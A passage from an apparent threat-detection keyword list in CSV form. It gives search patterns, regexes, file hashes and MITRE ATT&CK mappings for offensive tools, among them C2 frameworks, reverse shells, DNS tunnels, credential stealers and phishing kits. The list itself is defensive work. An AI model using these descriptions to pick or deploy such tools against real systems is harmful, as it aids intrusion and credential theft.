TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*demonizedshell_static.sh*",".{0,1000}demonizedshell_static\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*Dendrobate-master*",".{0,1000}Dendrobate\-master.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*dendron*FileMonInject.dll*",".{0,1000}dendron.{0,1000}FileMonInject\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*DeNiSe-master.zip*",".{0,1000}DeNiSe\-master\.zip.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*DeNiSePkg.py*",".{0,1000}DeNiSePkg\.py.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*deploycaptureserver.ps1*",".{0,1000}deploycaptureserver\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*DeployPrinterNightmare.exe*",".{0,1000}DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Description'>IE Passwords Viewer*",".{0,1000}Description\'\>IE\sPasswords\sViewer.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*DesertNut.csproj*",".{0,1000}DesertNut\.csproj.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*DesertNut.exe*",".{0,1000}DesertNut\.exe.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*DesertNut.sln*",".{0,1000}DesertNut\.sln.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*DesertNut_h.cs*",".{0,1000}DesertNut_h\.cs.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*-destPipe * -pipeHost * -bindPort *",".{0,1000}\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-bindPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Destroying all droplets*",".{0,1000}Destroying\sall\sdroplets.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*details-c80a6994018b23dc.js*",".{0,1000}details\-c80a6994018b23dc\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*detect ntdll.dll*",".{0,1000}detect\sntdll\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Detected a Windows Server version not compatible with JuicyPotato*",".{0,1000}Detected\sa\sWindows\sServer\sversion\snot\scompatible\swith\sJuicyPotato.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*Detected possible phantom shell command*",".{0,1000}Detected\spossible\sphantom\sshell\scommand.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*detect-hooksx64.*",".{0,1000}detect\-hooksx64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*dev.l1qu1d.net/wraith-labs/wraith*",".{0,1000}dev\.l1qu1d\.net\/wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*dev-2null/ADCollector*",".{0,1000}dev\-2null\/ADCollector.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*DEV-COBBR\\TestAdmin*",".{0,1000}DEV\-COBBR\\\\TestAdmin.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Device architecture unknown. Download cloudflared/loclx manually*",".{0,1000}Device\sarchitecture\sunknown\.\sDownload\scloudflared\/loclx\smanually.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f*",".{0,1000}df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc*",".{0,1000}df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb*",".{0,1000}df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef*",".{0,1000}df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301*",".{0,1000}df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d*",".{0,1000}df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0*",".{0,1000}df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f*",".{0,1000}df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46*",".{0,1000}dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dfbc5037fe0229e15f6f15775117aef5*",".{0,1000}dfbc5037fe0229e15f6f15775117aef5.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*dfscoerce.py -d *",".{0,1000}dfscoerce\.py\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dfscoerce.py*",".{0,1000}dfscoerce\.py.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*dfscoerce_check*",".{0,1000}dfscoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*DFSCoerce-main*",".{0,1000}DFSCoerce\-main.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*",".{0,1000}dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*",".{0,1000}dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*",".{0,1000}dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ\-\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dhcp_sniffer.py*",".{0,1000}dhcp_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*dhcp6.spoof.*",".{0,1000}dhcp6\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*Dialupass.exe*",".{0,1000}Dialupass\.exe.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Dialupass.zip*",".{0,1000}Dialupass\.zip.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dicts*generic-usernames.txt*",".{0,1000}dicts.{0,1000}generic\-usernames\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*dicts/ftp_pswd.txt*",".{0,1000}dicts\/ftp_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*dicts/ssh_default.txt*",".{0,1000}dicts\/ssh_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*dicts/ssh_pswd.txt*",".{0,1000}dicts\/ssh_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*diego-treitos/linux-smart-enumeration*",".{0,1000}diego\-treitos\/linux\-smart\-enumeration.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*dievus/lnkbomb*",".{0,1000}dievus\/lnkbomb.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*digitalocean-droplet-openvpn-all.jar*",".{0,1000}digitalocean\-droplet\-openvpn\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*DigitalOceanProxyTab$1.class*",".{0,1000}DigitalOceanProxyTab\$1\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*DigitalSignature-Hijack.ps1*",".{0,1000}DigitalSignature\-Hijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Ding Ding Ding! Email opened!*",".{0,1000}Ding\sDing\sDing!\sEmail\sopened!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*dinjector /i:* /p:*",".{0,1000}dinjector\s\/i\:.{0,1000}\s\/p\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github 